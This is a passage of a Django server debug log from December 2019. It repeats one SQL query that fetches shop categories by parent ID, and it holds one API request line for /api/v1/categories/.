utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:06:16,052 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:06:16,059 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:06:16,063 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:06:16,068 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:06:16,072 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:06:16,077 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:06:16,081 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:06:16,087 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:06:16,092 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:06:16,096 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:06:16,100 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:06:16,104 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:06:16,111 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:06:16,115 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:06:16,119 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:06:16,124 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:06:16,128 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:06:16,134 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:06:16,138 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:06:16,142 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:06:16,146 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:06:16,150 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:06:16,154 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:06:16,160 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:06:16,164 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:06:16,169 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:06:16,174 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:06:16,178 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:06:16] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:10:02,591 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:10:02,598 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:10:02,602 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:10:02,605 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:10:02,609 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:10:02,612 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:10:02,614 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:10:02,616 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:10:02,618 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:10:02,622 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:10:02,624 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:10:02,626 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:10:02,629 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:10:02,631 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:10:02,635 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:10:02,637 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:10:02,640 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:10:02,642 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:10:02,644 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:10:02,649 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:10:02,652 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:10:02,655 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:10:02,657 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:10:02,660 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:10:02,663 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:10:02,667 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:10:02,670 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:10:02,673 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:10:02,675 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:10:02,678 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:10:02,681 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:10:02,684 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:10:02,687 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:10:02,689 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:10:02,692 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:10:02,696 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:10:02,698 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:10:02,701 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:10:02,703 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 